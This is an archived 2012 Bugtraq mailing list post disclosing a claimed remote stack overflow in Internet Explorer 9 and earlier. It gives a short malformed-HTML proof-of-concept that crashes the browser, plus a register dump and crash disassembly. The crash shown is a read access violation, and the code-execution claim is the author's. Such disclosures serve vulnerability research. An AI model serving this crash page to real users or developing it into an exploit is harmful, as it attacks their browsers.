| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 19 Dec 2012 15:40:46 GMT From: pereira@...biz.de To: bugtraq@...urityfocus.com Subject: Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability ----------------------------------------------------------------------- Microsoft Internet Explorer 9.x <= Remote Stack Overflow Vulnerability ----------------------------------------------------------------------- Author: Jean Pascal Pereira <pereira@...biz.de> Vendor: Microsoft Internet Explorer 9.x and below Description: The application is prone to a remote stack overflow vulnerability. Successful exploitation may lead to arbitrary code execution. ---------------------------------------------------------------------- Proof Of Concept: ---------------------------------------------------------------------- <table></for xmlns="1"> <td><datetime><colgroup> <id><dd><col> </table><object> <hr><base> ---------------------------------------------------------------------- Register Dump: ---------------------------------------------------------------------- EAX 800706BE ECX 763FCDB3 RPCRT4.763FCDB3 EDX 00000000 EBX 0604393C ESP 003FDDD4 EBP 003FDDE0 ESI 003FDE30 EDI 761AFA10 ole32.761AFA10 EIP 7629CF51 ole32.7629CF51 ---------------------------------------------------------------------- Crash Instruction: ---------------------------------------------------------------------- 7629CF36 8B4D E4 MOV ECX,DWORD PTR SS:[EBP-1C] 7629CF39 24 04 AND AL,4 7629CF3B 0FB6C0 MOVZX EAX,AL 7629CF3E F7D8 NEG EAX 7629CF40 1BC0 SBB EAX,EAX 7629CF42 25 0A010180 AND EAX,8001010A 7629CF47 8901 MOV DWORD PTR DS:[ECX],EAX 7629CF49 8B45 E8 MOV EAX,DWORD PTR SS:[EBP-18] 7629CF4C 50 PUSH EAX 7629CF4D 53 PUSH EBX 7629CF4E 8975 D8 MOV DWORD PTR SS:[EBP-28],ESI 7629CF51 FF70 5C PUSH DWORD PTR DS:[EAX+5C] ---------------------------------------------------------------------- At 0x7629CF51, a read access violation occurs. ---------------------------------------------------------------------- Jean Pascal Pereira <pereira@...biz.de> || http://www.0xffe4.org Copy: http://paste.kde.org/627968/
Powered by blists - more mailing lists